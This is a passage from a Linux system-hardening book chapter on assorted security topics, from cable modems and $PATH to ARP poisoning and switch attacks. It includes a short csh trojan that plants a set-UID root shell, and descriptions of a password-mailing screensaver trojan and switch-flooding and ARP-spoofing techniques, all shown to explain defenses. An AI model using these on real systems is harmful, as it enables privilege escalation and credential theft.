Home > Articles > Operating Systems, Server

This chapter is from the book

3.4 Selected Short Subjects

These items are not related but they are not long enough to justify sections of their own. All are important, however.

3.4.1 Cable Modems

DANGER LEVEL

Cable modems are now quite common for providing Internet access to home systems. They have high bandwidth and are reasonably reliable, though less so than standard modem or DSL service. Home users are not used to worrying much about security because a modem on a standard (analog) phone is a private connection into the ISP's equipment that transports only that user's data. In other words, communication via modem is private in that no one else can sniff your data if he does not have direct access to your home network or to the network of whatever remote system you are interacting with.

The rules are different with cable modems, however. All the cable modems in a neighborhood of up to 100 or so systems are in a local area network (LAN) configuration. Windows users who enable "Network neighborhood" discover this when 10 or 100 systems they never heard of pop up on their desktop window. Regardless of whether you are running Linux, Windows, or something else, this opens up serious security holes. These other systems can sniff the network for any unencrypted data that you transmit, such as passwords supplied for telnet, FTP, POP, or IMAP. Note that some modern cable systems do not have the problem because they use true routers to protect each customer. Some DSL connections might have this problem as do some wireless arrangements.

The solution is to use only encrypted protocols such as SSL and SSH. Keep in mind too that this opens up your systems to various protocol-level exploits that require access to your LAN. These exploits include spoofed UDP and TCP addresses (because the cracker can see your response through the use of Promiscuous mode on his system even though it is not sent to his "real" address). Other exploits are available by poisoning your ARP cache and by his changing your system's MAC address or his. See "Preventing ARP Cache Poisoning" on page 146 for discussion on poisoning ARP caches.

The solution is to act as if you have untrusted people on the LAN, because you do. Certainly, if you have any non-Linux systems, you will want to configure your Linux box as a firewall. You should send all confidential data via a good encryption method such as SSH or SSL. DSL does not seem to suffer from this LAN problem.

3.4.2 $PATH: Values of . Give Rise to Doom

DANGER LEVEL

As many people know, the $PATH environment variable contains a list of directories to search to find the program that the user has requested be executed. It is used if there is no slash in the program name. Typically it contains directories such as /bin, /usr/bin, /usr/local/bin, perhaps $HOME/bin, etc.

The title of this section is inspired from the error message given by the UNIX Version 6 rmdir command if one tried to rmdir ".", except that "doom" was mistyped as "dom" until I pointed this out.

For ordinary users and for root, commonly it also contains "." specifying one's current directory. This is convenient when one develops or uses locally developed scripts or programs. It saves the bother of typing ./widget.

For root, it is one of the worst security holes possible on Linux! A SysAdmin operating as root frequently can be found in almost any directory in the system, including /tmp, home directories of users who might have been compromised or even may be malicious, and directories where insecure applications may be found.

Worse still, frequently "." is listed first in the search path. Thus, all a cracker needs to do is place scripts or programs in such directories with the same name as programs commonly invoked by root, such as ls, who, ps, favorite_editor, etc. For ls, all that would be required would be

#!/bin/csh
if ( ! -o /bin/su ) goto finish
cp /bin/sh /tmp/.sh
chmod 4755 /tmp/.sh
finish:
exec /bin/ls $argv | grep -v ls

It is interesting to note that csh refuses to operate if its executable is set-UID to root; clearly the reason for this is to block this exploit. Perhaps this feature should be added to the other shells. That would not slow someone down by much because using chmod would work almost as well as would cp, dd, or a host of other programs. The rule should be that root absolutely not have "." in the search path and if other users do, that "." is at the very end of the search path. Thus, even ordinary users will not be compromised by this very common technique. This would even slightly speed up the system.

Note that some intruders have been known to create such traps with mistyped names of common programs hoping that someone would then mistype one. Such a trap would catch someone having "." at the end of the search path. This is why root should not have "." anywhere in the search path. The consequences of root having "." in $PATH are too great to allow the risk. Also, it is an excellent idea to do a periodic /bin/ls of directories such as /tmp, /usr/tmp, /var/tmp, FTP's directories, those where CGIs play, and users to ensure that these traps have not been planted. An alternative to typing the full path name (/bin/ls) would be to run it from a trusted directory, such as /root, thusly

cd /root      
ls /tmp      
ls /usr/tmp      

etc.

The periodic use of find, invoked from root's crontab, would be an excellent idea.

3.4.3 Blocking IP Source Routing

DANGER LEVEL

Normally, a system that routes packets on to other systems, such as a firewall, decides where to send a packet by looking up the packet's destination address in the system's routing table. A packet can alter this by requesting source routing. This means that the packet tells the routing system where to send it. This is another concept that dates back to a kinder, gentler Internet. Although very rarely useful to white hats these days, a black hat can use source routing to get packets into networks that weak firewalls are trying to protect.

This is a serious enough problem that TCP Wrappers automatically disables source routing on services that it protects; this does not protect your other services. Systems occasionally get broken into in this manner. The solution is to have the kernel disable all source routing; packets with this feature enabled simply will be dropped (thrown away). It is suggested that all routers and servers do this; the overhead of doing this is zero.

The following commands will disable source routing and should be placed in /etc/rc.d/rc3.d/S22nosrcrte, and should go on your firewall or router. (You will want to symlink it from /etc/rc.d/init.d/nosrcrte.) The vast majority of systems will not need source routing so this is quite safe to do. It also disables ICMP redirect requests. These are instructions to have your system use a different "shorter" route for packets that could include the cracker's box or a third party for a DoS attack.

The script is available on the CD-ROM. TCP Wrappers will disable source routing for services that it handles but this does not protect services supplied by daemons. Use of the script described here (on systems with 2.2 and later kernels) will protect all services:

Various types of packet spoofing are discussed in "Packet Spoofing Explained" on page 239.

3.4.4 Blocking IP Spoofing

DANGER LEVEL

A useful kernel feature to protect against IP spoofing is called Source Address Verification. It started with the 2.2 kernels. When it is enabled, the kernel checks each incoming packet by verifying that it came in on an interface that is appropriate for one with this packet's source address. It bases this on its routing table, which must be set up correctly for this protection to work. Inappropriate packets are dropped.

For example, on a home or small business network, the internal interface is eth1 and has a network of 10.*.*.*, the reserved class A network. The external network, connected to eth0 and attached to the Internet has a real Internet IP address. If a packet with a source address of 10.0.0.17 comes in from eth0 (the Internet), it is inappropriate and will be dropped. Crackers know that an organization's systems will give a higher level of trust to internal systems than it will to external systems and so will try to break in with faked source addresses.

You might be granting this trust by specifying allowed IP addresses or host names with TCP Wrappers or similar. Although the same effect can be had with IP Chains, Source Address Verification easily adds to the "Rings of Security" in case of error. The following commands will enable this and could be placed in /etc/rc.d/rc3.d/S22nospoof, and should go on your firewall or router. (You will want to symlink it from /etc/rc.d/init.d/nospoof.) The script is available on the CD-ROM.

#!/bin/sh
# Turn on Source Address Verification on all interfaces
if [ -e /proc/sys/net/ipv4/conf/all/rp_filter ]; then
      echo -n "Enabling IP spoofing blocking..."
      for f in /proc/sys/net/ipv4/conf/*/rp_filter; do
            echo 1 > $f
      done
      echo "done."
else
      echo "ERROR: CANNOT SET UP IP SPOOF BLOCKING!  HELP!"
      sleep 30
fi

Various types of packet spoofing are discussed in "Packet Spoofing Explained" on page 239.

3.4.5 Automatic Screen Locking

DANGER LEVEL

Certainly, most sites should require users either to lock their screens or to log out when away from their systems. For the user that operates under X, xlock may be invoked to immediately lock the screen until the user supplies the account password later.

For automatic locking after the keyboard and mouse are inactive for a set number of minutes xscreensaver may be run in background with the -lock-mode flag. For those using Gnome, this may (and should) be made to happen automatically. To do this, the navigation sequence is

footprint->Settings->Desktop->Screensaver

Then click to indicate Require password and set the number of minutes to an appropriate value between 5 and 30. Finally, click OK.

The author is the inventor of the lock program shipped with Berkeley UNIX.

Do be aware that there is a potential here for a screensaver simulator, similar to the login simulators discussed in "Defeating Login Simulators" on page 325, and it is easy to install. All someone needs to do is to get the source to xlock or xscreensaver, modify it to also mail the entered password to a rogue account, and install it on the system.

The installation can be as easy as setting up a transponder that will e-mail the uuencoded10 binary to whatever account sends e-mail to the special account. The interloper sends this e-mail from the victim's terminal, runs uudecode on the reply e-mail, and installs the resulting binary in the victim's bin directory. This might be done in two minutes. An alternative is to have a second person standing by to receive this e-mail and do a "reply" with the Trojan.

Of course, if the system has a floppy or CD-ROM drive, it could be used but that would be more incriminating and, in many jurisdictions, probably would be justification for Security to hold the person for the police and there would be that evidence that would send her to jail.

The Trojan will remove itself when it has done its job. This is a very good reason for physical security to be tighter than it is in most organizations, where someone unfamiliar to employees can loiter about and sit in a cube where the walls hide the person's actions.

3.4.6 /etc/mailcap

DANGER LEVEL

One of the fun and somewhat recent features in computing has been multimedia features, including multimedia e-mail. In Linux, most of the mailers use the /etc/mailcap file (metamail capabilities file) for instructions on what program to invoke to process each type of data in the message. Some of these types are believed to be benign, such as .gif and .jpeg images and .mpeg movies. Others such as Bourne and C shell scripts, PostScript, troff, Perl, Tcl, and tar archives are too dangerous to be allowed.

These latter formats allow the creator to issue certain commands that could be harmful to the system. Although it is obvious that a Bourne or C shell script could contain an rm -rf / command, not too many people know that both PostScript and troff allow shell escapes that could contain the same harmful Trojan.

It is hard to determine which types of mail attachments are truly safe. These dangerous "shell escapes" are a dirty little secret that many want to ignore.

There is the additional security problem in that a user may specify her own $HOME/.mailcap file. The default search path will look for this file before looking for the system mailcap files. This allows any user to override your carefully constructed /etc/mailcap file. You could install the .mailcap file that you want in each user's home directory and set the immutable bit to prevent users from altering your version via

chattr +i /home/*/.mailcap

However, a user could change her $MAILCAPS environment variable to specify a different place to obtain this information. This cat and mouse game could go on with your setting the immutable bit on users' shell startup files or modifying metamail to use only the system mailcap file and users importing their own metamail programs. Netscape has its own configuration file with a set of commands that serve an equivalent function to /etc/mailcap and thus can have the same problem. This is discussed in "Important Netscape Preferences" on page 262.

The ancient Mail program (mailx on some distributions) does not support multimedia directly. However, Mail allows the use of a "PAGER" program, typically more or less. This feature was intended to allow a user to specify the name of a program to page though long messages one screen at a time. When this is done, Mail is at the mercy of the system's /etc/mailcap configuration. This Mail feature can be used to get a multimedia capability quite easily with the following entries to your .mailrc file:

set PAGER=/usr/local/bin/metamail
set crt=1

3.4.7 The chattr Program and the Immutable Bit

DANGER LEVEL

The standard file system for Linux systems is the ext2 file system, though Linux supports many other file systems, including several Microsoft formats. It is not common knowledge that the ext2 file system is a superset of the Berkeley UNIX Fast File System. Among the features added to the ext2 file system are several additional bits that alter the handling of files with those bits. One of the most powerful and useful is the immutable bit. When the immutable bit has been applied to a file, that file may not be altered in any way (except that reading that file's data will update the access time in its inode block). This includes altering the file's data through write() or altering the file's inode information through chown(), chmod(), etc.

The immutable bit overrides the normal Linux permissions and not even root can alter a file with the immutable bit set, except by removing the immutable bit first. Only root is allowed to set or remove the immutable bit; the command to add the immutable bit to the file foo is

chattr +i foo

and the command to remove it is

chattr -i foo

The immutable bit may be overridden only by access to the raw disk device in /dev. The chattr program supports the -R flag that will cause it to operate on an entire directory tree.

3.4.8 Secure Deletion

DANGER LEVEL

The ext2 file system claims to support secure deletion but does not. Recall that normally when a file is removed, Linux and UNIX will mark the data blocks as available for reallocation to another file but will not overwrite the existing data in any of these data blocks until that block subsequently is selected for allocation and written to by the new program.

This failure of Linux to overwrite possibly confidential data when a file is removed or truncated is not considered a security problem because root is the only user that can see those blocks on a correctly configured system.

For high-security applications where you want to harden a system to minimize damage if the system is cracked, this is not acceptable. One solution is for an application to have knowledge of the kernel's file I/O algorithms and, thus, for the application to overwrite its confidential data before removing or truncating a file that it is manipulating. This technique is discussed in "Truly Erasing Files" on page 162.

Secure deletion is documented as not supported as of the 2.4 kernel in ext2 and ext3. I confirmed this experimentally with 2.4.18 on RH7.3. A quick test was conducted where a file with a known unique pattern was created via cat > foo, its secure deletion bit set, and the file removed. A subsequent grep of the raw disk partition did unexpectedly find the deleted block with this pattern in it.

Normally, I/O operations to the disk are done asynchronously with respect to the system calls that request these operations. This offers a tremendous performance improvement which helps explain why Linux outperforms some other operating systems on the same hardware by a factor of two. The disadvantage is that in the unlikely event of a crash, the file system is not left in a completely known state.

For example, it will not be known if a file that was removed while the secure deletion flag was on actually was securely removed. Even if an application is keeping track of the status of removed files, these applications will not know if the secure deletion was completed. A solution to this dilemma is the additional use of the synchronous bit, discussed in "Synchronous I/O" on page 139, though there is a severe performance penalty for this.

Note that this ext2 secure deletion feature is activated when a file is removed but not when it is shortened through truncation. This shortening might be done via

cp /dev/null foo

or with the creat() or ftruncate() system calls. To successfully overwrite confidential data when doing these operations, use the methods in "Truly Erasing Files" on page 162.

3.4.9 Synchronous I/O

DANGER LEVEL

Normally, Linux does actual I/O operations to the disk asynchronously to system call requests that initiate this I/O. This means that when a program's invocation of the write() request returns a successful status, the program issuing this system call cannot know absolutely if the write was successful because it probably has not happened yet.

Even though Linux normally does I/O asynchronously, a system call always will indicate if there is not enough space in the file system to complete the write operation. (This is done by returning a byte count smaller than the count that was requested if write() fails or with ENOSPC if any other system call fails from this condition.) This notification is because the I/O buffering is done at the block device level, which is at a lower level (later) than the file system level that worries about free space on a file system.

In certain circumstances when you want a program to know absolutely if the I/O has completed, the ext2 file system's synchronous bit may be used to alter the rules. When this bit is set on a file, all I/O to that file will be done synchronously. This means that the write() system call will not return until the actual write request to the disk device has completed successfully and the disk device has indicated that the data has been written successfully.

The hdparm documentation also seems to state that this write cache normally is off but the documentation is not clear. Based on observed performance of various disk models, I am not convinced that this feature is off by default. Besides inspecting the disk driver's source code for clues, one test would be to configure synchronous mode for a file, write data to it, and then immediately turn off power to the system. After boot-up see whether the data was written to the disk successfully. (Obviously, there is risk of file system corruption so this test should not be done on a system with anything of value on any mounted file system.)

As an alternative to setting synchronous mode on a per-file basis, you can set synchronous I/O on a per-file system basis with the sync mount option.

Even if the disk device has indicated that data was written to the disk successfully, many modern disk devices have their own buffer, sometimes known as a disk cache or on-disk cache. One solution to this problem of not knowing when the data in the disk cache has actually been written to the media is to disable the disk device's write cache. This capability is mentioned briefly in the documentation for the hdparm program, which states that the -W flag controls this.

3.4.10 Mount Flags for Increased Security

DANGER LEVEL

Linux offers a number of per-file system flags that may be specified either directly to the mount command when a file system is mounted or in the /etc/fstab file so that they are accepted automatically unless overridden on the command line to mount. These may be used for an additional "Ring of Security." On the command line these may be listed as a comma-separated list to the -o flag.

  • nodev

    This flag prevents the kernel from recognizing any device files on the file system. If there is no reason for there to be any device files on the file system, this prevents breaching security simply by creating a hda1 or sda1 device that is writable by all. This especially is useful for CD-ROM- and NFS-based file systems.

  • noexec

    This flag prevents any executable on the file system from being executed. This is useful for file systems where there should not be executables. This can be useful for file systems serving as Apache (httpd) repositories for other than CGI scripts.

    Understand that this inhibits only executables started directly by the kernel. They will not protect against someone doing, say,

    sh /httpd/htdocs/foo.sh
    
  • nosuid

    This flag prevents set-UID or set-GID bit on any executable file from being honored. Again, this prevents the use of certain "hacks" to breach security in the event of a crack in the "Rings of Security."

  • ro

    The ro flag causes the file system to be mounted Read/Only, inhibiting any alteration of information on the file including any file's access time value. This is a fine option to use on file systems used for httpd htdocs directory trees for unchanging data.

3.4.11 Wrapping UDP in TCP and SSH

DANGER LEVEL

In "Why UDP Packet Spoofing Is Successful" on page 242, the ease in which UDP packets can be spoofed was examined and why generally it is not secure unless it is used on a network protected from untrusted systems. Although SSH offers a secure tunnel for TCP connections, it does not offer this service for UDP packets. This is by choice rather than any absolute technical limitation.

Although a process can use an open UDP port to send packets to any UDP port of any IP address in a random manner, most usage involves a sequence of packets exchanged between pairs of systems. A UDP-based server, such as NFS, can be thought of as having simultaneous conversations with a number of clients. The solution is to write a small client/server UDP-TCP translator system that converts between UDP and TCP. This actually could be quite easy.

The UDP client would send its UDP packets to a dedicated UDP port on its own system instead of the server's system. IP Chains on that system would block packets from other systems attempting to send to either of these two ports (the original UDP client or the client side of the UDP-TCP translator) to prevent spoofing. The translator would open a second port as a TCP port to one end of a SSH tunnel on the same system. Each UDP packet's data would be sent to the TCP port with a 16-bit (2-byte) header specifying the count because each UDP packet is a specified size while TCP is an unblocked sequence of bytes.

SSH would encrypt data from the TCP port and transfer it to the server machine and send it to the specified port where the server side of the UDP-TCP translator would convert it to a UDP packet. This is done by reading the 2-byte header and then reading that many bytes, assembling the data into a buffer. This buffer would then be sent as a UDP packet to the ultimate server. Data from the UDP server would make a corresponding journey back to the UDP client.

3.4.12 Cat Scratches Man

DANGER LEVEL

The man program is used to display sections from the online Linux manual. This is a very useful feature. It has some minor problems, in that formatting the nroff files is slow and the documentation takes up a lot of disk space. Well, these used to be problems when processors were slower and disks were smaller. In any case, the man program was enhanced so that when a page was formatted, the formatted page would be stored. The next time any user wanted to see that page, the man program quickly copied that stored formatted version. On many versions of Linux, the formatted version is stored in a compressed form to reduce disk space.

No doubt you can see the problems. On most Linux systems, the directories where these semi-temporary files containing the formatted pages are mode 777 and the files are created mode 644 and owned by the user who first invoked man on for the respective page. The security problems that this creates are as follows:

  1. A directory with mode 777 is created, allowing users to store random files temporarily without administrative control, notice, or restrictions. Certainly, on a significant percentage of systems these directories are used to store cracker warez (cracker tools), pornography, and files that the users do not want seen in their own directory trees.

  2. An evil user can plant false documentation, inducing a user or programmer to create a security hole based on this false documentation.

  3. An evil user can create empty files there, preventing legitimate users from obtaining the documentation they want.

  4. Over time, these directories can accumulate a large amount of data, reducing the disk space available for other uses.

There are several solutions.

  1. Disable this "cat" feature by removing the cat directories. For each section of the manual, manX, the man program will try to put the formatted version in the directory catX only if catX exists. It will look for an existing formatted copy of the desired manual page only in catX if it exists. The man program will not try to create these directories.

    Thus, the solution is to remove them. Carefully cd to /usr/tmp and type the command

    /bin/rm -rf /usr/man/cat*

    (The cd to /usr/tmp is to minimize accidentally putting a space before the *.) If you get extra spaces in this command, plan on doing a full system restore.

  2. A user called man could be created and the man program and the /usr/man/cat* directories could be changed to be owned by man. The man program then could be made set-UID to man. This safely will allow this feature. Besides enabling this capability, they clean out any existing manual pages that might be bogus. The use of the cat*/ sequence is because on many systems these cat "directories" actually are symbolic links, typically to a directory tree on the /var file system. This technique causes the actual directories and their files to be affected rather than the symbolic links themselves. The commands to set this up follow:

    Create a man user with a unique UID
    /bin/rm -f /usr/man/cat*/*
    ls -la /usr/man/cat*/.
    chown man /usr/bin/man /usr/man/cat*/.
    chmod 4755 /usr/bin/man; chmod 2755 /usr/man/cat*/.
  3. Formatted manual pages that have not been accessed recently can be removed nightly by placing the following command in root's crontab. Note that this feature will not work if the backup mechanism causes files' access times to be altered when the backup is done or if users regularly read all files on the system, thereby updating the access times. If either of these is a problem, the -atime may be changed to -mtime.

    find /usr/man/cat*/. -type f -atime +30 \
       -print | xargs -n 50 /bin/rm -f

3.4.13 Limiting Your Success with *limit

DANGER LEVEL

Under Linux, there are many attributes that a process inherits from its parent during a fork and which are retained across an exec. Most SysAdmins are familiar with some of these attributes such as the process's UID, GID, current working directory (cwd), and root directory that is affected by chroot, as well as open file descriptors. Additionally, there are limits on the resources that a process may use. These limits are intended to prevent a runaway process, that is, a program bug or user error from running the system out of critical resources. Under bash (sh) the current limits of these resources may be listed with the ulimit -a command. A typical response would be

core file size (blocks)  2097151
data seg size (kbytes)   unlimited
file size (blocks)       1048576      
max memory size (kbytes) unlimited
stack size (kbytes)      8192
cpu time (seconds)       unlimited      
max user processes       256
pipe size (512 bytes)    8
open files               256
virtual memory (kbytes)  2105343

The value of these limits are not magically changed when a user invokes a set-UID program. Thus, an evil user or even just a curious one could cause a set-UID program to fail in unanticipated ways by setting some of these limits to low values prior to invoking the set-UID program. Unless the set-UID program is very carefully written, there might be security holes that could be generated by this fiddling with resource limits. The solution is for the programmer creating a set-UID or set-GID program to check the value of important limits, try to boost any that are too low, and exit with an error if any necessary limit cannot be raised to an acceptable level. The setrlimit() system call is used to set these limits; the getrlimit() system call is used to get these limits. The getrusage() reports the current usage of various limits.

The SysAdmin can set the limits for ordinary users by placing the appropriate commands in users' .profile, .login, .bash_profile, or .tcshrc files, setting these files' immutable bit (chattr +i), and inhibiting users from changing their shells (or giving each user an appropriate startup file for each shell allowed in /etc/shells). PAM's pam_limits.so can also be used.

3.4.14 Shell History on Public Display

DANGER LEVEL

Both csh and bash have a wonderful feature in that they will store a history in memory of recently executed commands that the user has issued. This feature allows a user to build up a new command to issue from pieces of previous commands, such as long file names, or simply may be used to repeat commands, for example, during debugging. Additionally, it allows a user to refresh his memory regarding recently issued commands or those of the previous afternoon. When the user exits, this history can be stored in a file in the user's home directory. When the user logs in again first thing in the morning, he can see what he had been working on the previous day or perhaps the previous Friday. This is a helpful memory aid.

The problem with this is that it also clues in a cracker to what you have been up to and what is important on your system. The names of other systems that you and your users have connected to are shown so that the cracker can start cracking them too. If your users use a mailer where the recipient's address can appear on the command line, that information too is available. This will suggest other systems for the cracker to work on or possibly people to perpetrate an e-mail scam against. Some poorly designed commands still take a password on the command line and these will be stored in the history file; commands where your users supply a password from a file will be visible so a cracker will know what file holds the password.

The solution is to limit the amount of history saved on disk, perhaps to 10 commands. If using csh, the following line may be placed in a user's $HOME/.cshrc file or the system-wide /etc/csh.cshrc.

set savehist=10

Users of bash will benefit from the following entry in $HOME/.bash_profile, or /etc/profile.

HISTFILESIZE=10

Occasionally, people issue some commands just before exit or logout that should not be remembered in the history. The solution is to issue the appropriate set command interactively to set the saved history size to zero prior to exiting.

After a security breach, be sure to check users' history files for evidence that the intruder left behind. Although a skillful cracker will leave no evidence, a less skilled one will.

3.4.15 Understanding Address Resolution Protocol (ARP)

Even though we typically envision TCP packet transfers occurring at the IP address level, when traveling on an Ethernet, each packet is addressed by MAC (Media Access Control) addresses only. These MAC addresses are six hexadecimal pairs, such as 00:20:AF:27:C7:EA, that are almost never seen by users or SysAdmins in normal operation. They also are known as Ethernet addresses. When one device wants to communicate with another over the local Ethernet, the IP address is not sufficient to send the packet; the MAC address must be used, and before it is used it must be discovered. This is what the Address Resolution Protocol (ARP) does.

The local TCP stack sends a broadcast ARP packet asking, for example, "Who has IP address 192.168.5.2?"; the device with that address responds with its 6-byte hardware MAC address. Now, the normal packet is delivered to its destination without further delay. This process is called "Discovery." It would be inefficient and unnecessary to do this IP to MAC discovery for each normal packet to be sent, because this would almost triple the traffic. Instead, each system maintains an "ARP cache" of recent IP to MAC mappings and the system looks in this table before bothering with an ARP request. Entries in this table have a very short lifetime, except for permanent entries, defaulting to a minute on Linux. To see your system's value, in seconds, issue the command

cat /proc/sys/net/ipv4/neigh/eth0/gc_stale_time

The command

echo 120 > /proc/sys/net/ipv4/neigh/eth0/gc_stale_time

will change the cache time to 120 seconds but it is a good idea not to alter these values without a thorough understanding of the consequences and certainly not on a production network without careful testing. After this timeout has occurred, if there is space in the ARP cache, the entry will still be used to ask the particular target system first what MAC address should be used for sending a packet to a particular address before doing a broadcast. This avoids a broadcast and wasting cycles of the possibly hundreds of systems on that segment. This is important to remember if you suspect that your ARP caches were poisoned. The ARP cache can be viewed via

arp -a

or

cat /proc/net/arp

An individual entry, say, pentacorp.com, can be deleted from a system's ARP cache via

arp -i eth0 -d pentacorp.com

Be aware that many Cisco routers and other devices violate the ARP protocol and either cache the data for up to 30 minutes (not seconds) or refuse even to do discovery at all. Instead, they may only cache ARP data when a system sends out a packet.

Proxy ARP is an extension of ARP, where a device responds to ARP requests on behalf of another device. It is a type of routing commonly used on small networks where the cost or complexity of dedicated routing hardware is not desired, as a replacement for standard routing. The device simply listens for any IP address in the range of the remote's address space and responds with its own MAC address. Once the packet arrives, it forwards the packet to the other end, possibly over a non-Ethernet medium such as a T1 circuit or PPP connection.

ARP problems may be detected by Arpwatch, discussed in "Using Arpwatch to Catch ARP and MAC Attacks" on page 626.

Also see MAC in the Index.

3.4.16 Preventing ARP Cache Poisoning

DANGER LEVEL

ARP stands for Address Resolution Protocol. It is the protocol that maps a numeric IP address to the MAC address of an Ethernet card (network interface card, or NIC). The MAC address is what actually is used for addressing most packets on an Ethernet.

If a cracker can compromise a system on an Ethernet segment, he easily can change the ARP cache of any system on that segment. If your gateway systems support Proxy ARP, he can substitute any system on the Internet for any of your systems with terrible consequences. Note that even this Proxy ARP attack must be launched from a system on the LAN but if he has access to one he can use a Proxy ARP attack to have these packets routed to and from any Internet system.

"Hardwiring" the ARP addresses is effective at stopping ARP cache poisoning. These are known as permanent ARP addresses. Because the ARP cache data for a system usually changes only when its IP address changes or its Ethernet card is changed due to a hardware failure, this data typically changes very infrequently. (See "Checking the Cache" on page 553 for details on how to have a replacement Ethernet card use the same MAC address as the old one.)

On each Linux or UNIX system, edit /etc/ethers and add a line for each system that a given system needs to communicate with reliably. On each line, the host name or IP address should appear, followed by white space and the MAC address. The MAC address should be six pairs of hexadecimal numbers, with the pairs separated with colons. A "#" character starts a comment. The following line should be added to the /etc/rc.d/rc.local file so that /etc/ethers is processed at boot-up time. It must be executed after Ethernet interfaces and static routing tables are set up as these are needed first.

arp -f /etc/ethers

Alternatively, issue the commands directly to add these permanent entries (until the next reboot), as in this example:

arp -i eth0 -s 64.124.157.102 03:F3:B7:D5:63:32

To list the contents of your ARP cache, issue the command:

arp -anv

ARP problems may be detected by Arpwatch, discussed in "Using Arpwatch to Catch ARP and MAC Attacks" on page 626.

Also see MAC in the Index.

3.4.17 Hacking Switches

DANGER LEVEL

Most system administrators give little thought to switches, considering them barely above electrical junction boxes. Recall that switches and hubs route traffic between different systems, commonly 10Base-T and 100Base-TX Ethernet and similar hardware. This routing is done based on the MAC address; see "Preventing ARP Cache Poisoning" on page 146 for details on how ARP is used to map a system's IP address to its MAC address. A true hub has no intelligence. It takes a packet originating from any system and forwards it to all other systems, letting the intended recipient pick out the traffic that is meant for it. While this will limit the bandwidth for demanding applications, there is a more severe problem.

The biggest security problem with a hub is the same problem experienced with the original coax "thicknet" and "thinnet" Ethernet: All traffic between any pair of systems can be seen by all other systems on the network. This allows any rogue or compromised system on the network to sniff all other traffic, destroying any security for unencrypted traffic. The solution, of course, is the present day staple: 10Base-T- and 100Base-TX-based systems connected to switches. Each system has a separate wire leading to the switch. Of course, this destroys one of the two important features of the original Ethernet, namely the use of a single data cable rather than the rat's nest of wires that the graybeards remember as serial TTY communications.

Tip for Sniffing

Many experienced SysAdmins wanting to use a third system to sniff traffic between two other systems know to use a hub between them instead of a switch. This is because the hub will broadcast traffic to all of the connected systems, while a switch will forward traffic only to the port that the destination system is on (except for broadcast packets). For those mixing 10Base-T and 100Base-TX systems, however, a surprise awaits.

Most hubs consist of a 10Base-T hub and a 100Base-TX hub connected together by a switch. Each system is electrically connected to the appropriate hub within the box. Thus, if one is using an old 10Base-T system to sniff traffic between two 100Base-TX systems, one will see only the broadcasts. This problem occurs, too, when using a 100Base-TX system to sniff traffic between 10Base-T systems. The best solution, therefore, is to make the three systems consistent with each other: all composed of 100Base-TX or all composed of 10Base-T.

One alternate solution is to configure one of the 100Base-TX systems to operate as a 10Base-T system. Another solution is to use a 10Base-T-only hub, because this forces all systems to operate as 10Base-T systems. Yet another solution, if the only 10Base-T system of the three is not the sniffing system, is to put the 10Base-T system on a second 10/100 hub or switch with that second hub or switch connected to the 10/100 hub to which the other two systems are connected. This last solution works because the second hub or switch appears to be a 100Base-TX device to the first 10/100 hub. Since all three devices of interest on it (one system being monitored, the sniffing system, and the second 10/100 hub or switch) are 100Base-TX devices, all traffic between them will be broadcast.

Lastly, many Ethernet drivers for Linux allow forcing a 10/100 card to 10Base-T mode. Windows users can use the Control Panel's Network and Dial-up Connections item to do this, and Mac users can use the Apple System Profiler. Consult the Ethernet HOWTO.

Unlike a hub, a switch observes incoming traffic coming from each cable (port) and builds a database detailing which system is on what cable. Thus, when a packet is received, the switch sends the packet exclusively via the cable that the destination system has been mapped to in the switch's database. Is this the end of the problem? Is the switch's database big enough to keep up with lots of updates under maximum load? How is it structured? What happens if it overflows or suffers from other limitations or attacks? What are the consequences of using multiple switches?

The answers depend on how a particular model and brand of switch is designed. Most "fail open." This means that if a switch's cache is full and a destination address has not yet been stored or if the switch is too busy to determine which cable links to the destination system, the data will be broadcast to all systems. In other words, the switch falls back to being a hub, broadcasting all data. How big is that database and how easy is it for a cracker to overflow it and destroy your intended switch-based "physical" security? To detect this sort of attack, I highly recommend Arpwatch.

Most switches, even low-end ones, can accommodate a minimum of 8,000 MAC addresses. Long before that level is reached, Arpwatch should have gotten your attention unless the cracker is careful enough to limit his packets to nonbroadcasts with destinations behind the same switch.

Arpwatch is open-source software, created by the U.S. government's Lawrence Berkeley Labs. I have made major enhancements to Arpwatch and my version is on the CD-ROM. I discuss its use in "Using Arpwatch to Catch ARP and MAC Attacks" on page 626.

Forcing almost any switch to act as a hub is trivial. A cracker just floods the network with packets containing different spoofed source and destination IP or MAC addresses while sniffing. She will need to filter out her own noise, but that is as simple as using a destination port that she is not interested in. An even better approach the cracker might take is to gain control of the switch and tell it where to deliver traffic.

The security problem of "sniffing" caused people to change from coax Ethernet to switches with a separate cable to each system. In a classic "failure to learn from history" lesson, this wisdom regarding sniffing has been lost in the rapid transition to wireless networks that essentially have no defense against sniffing. The much-discussed Wireless Equivalent Privacy (WEP) can be cracked in about eight hours of passive monitoring by any cracker. (See "Wireless Equivalent Privacy (WEP)" on page 153 for details on wireless security.)

Some switches are configurable by the system or network administrator. Many administrators have not bothered to change the password from the vendor's default. It took me only a minute with Google to find a list of the default passwords for hundreds of popular switches from major manufacturers. Even switches with decent (but not great) passwords can be cracked over time. Will you be alerted if one of your switches is under siege by a brute-force password guessing attack? When multiple switches are involved, the problems multiply as each one passes on just the information it thinks is appropriate. This can make the analysis of possibilities and countering them challenging.

It may not take even an ARP attack against a switch to allow a cracker access to the raw packets on your network. Many advanced switches have a monitor capability, allowing you to monitor traffic on one or more ports on the switch. A designated monitor port can be set in one of three monitoring modes.

  • Monitor another port—essentially in "parallel" with that port.

  • Monitor a given 802.1q vlan.

  • Monitor all ports on the switch.

By grabbing the admin IP of the switch and then using default passwords (shame on your SysAdmin for not changing them), a hacker can configure the monitor port to be hers and can view data bound for other systems. There are some switches that can restrict where administration connections can originate by IP or switch port. Check the documentation for your switch to see if it has this feature. Never forget that switches have software too, and as we all know—repeat it with me—"all software has bugs."

A cracker (operating from a system on your LAN, of course) does not need to bother with switch password cracking, though. He merely determines the MAC and IP addresses of your firewall, router, server, or other system of interest. Then he sends a packet using his MAC address and the IP address of the system he is attacking as the source address. The switch will see the packet and update its database. Any future traffic with a destination IP of your system being attacked will be sent to the compromised system under the cracker's control. He then can sniff each packet easily, alter it as he desires, and forward the altered packet to its rightful owner without your noticing. I discuss solutions in the next section.

3.4.18 Countering System and Switch Hacking Caused by ARP Attacks

DANGER LEVEL

